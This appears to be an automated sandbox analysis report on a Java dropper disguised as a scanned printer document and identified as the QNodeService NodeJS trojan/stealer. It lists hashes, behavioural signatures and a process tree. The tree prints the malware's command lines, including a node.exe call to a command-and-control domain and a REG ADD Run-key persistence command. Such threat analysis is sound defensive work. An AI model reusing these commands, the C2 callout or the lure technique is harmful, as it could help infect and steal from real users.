Analysis
-
max time kernel
128s -
max time network
146s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 12:49
Static task
static1
Behavioral task
behavioral1
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win7
Behavioral task
behavioral2
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win10
General
-
Target
Scanned from a Xerox Multifunction Printer.jar
-
Size
79KB
-
MD5
7dba8420e5d72c58298108bb85e0eb96
-
SHA1
0f54ab5e95fa9639b1262ef8b39d2e2d49d6e467
-
SHA256
712889ab26a68bc90c620870eb8e3f5be8f46cdde742ebc63d6e891ca63b04a5
-
SHA512
6f7db07f9332cd77a07a857ea88de507ff8243f6c11f267a3b7a7b07ab9c42775db05dc1f6f12e7c367f92ce43adc5ff2927f940a6580f52e5420402c1bc93ae
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2696 node.exe 3612 node.exe 2332 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab66-173.dat js behavioral2/files/0x000100000001ab66-177.dat js behavioral2/files/0x000100000001ab66-181.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 wtfismyip.com 28 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2696 node.exe 2696 node.exe 2696 node.exe 2696 node.exe 3612 node.exe 3612 node.exe 3612 node.exe 3612 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe 2332 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3996 wrote to memory of 2212 3996 java.exe 75 PID 3996 wrote to memory of 2212 3996 java.exe 75 PID 2212 wrote to memory of 2696 2212 javaw.exe 79 PID 2212 wrote to memory of 2696 2212 javaw.exe 79 PID 2696 wrote to memory of 3612 2696 node.exe 81 PID 2696 wrote to memory of 3612 2696 node.exe 81 PID 3612 wrote to memory of 2332 3612 node.exe 82 PID 3612 wrote to memory of 2332 3612 node.exe 82 PID 2332 wrote to memory of 3136 2332 node.exe 84 PID 2332 wrote to memory of 3136 2332 node.exe 84 PID 3136 wrote to memory of 296 3136 cmd.exe 85 PID 3136 wrote to memory of 296 3136 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Scanned from a Xerox Multifunction Printer.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\06818f60.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain karimrnosa2.home-webserver.de3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr9vwb\boot.js --hub-domain karimrnosa2.home-webserver.de4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr9vwb\boot.js --hub-domain karimrnosa2.home-webserver.de5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:296
-
-
-
-
-
-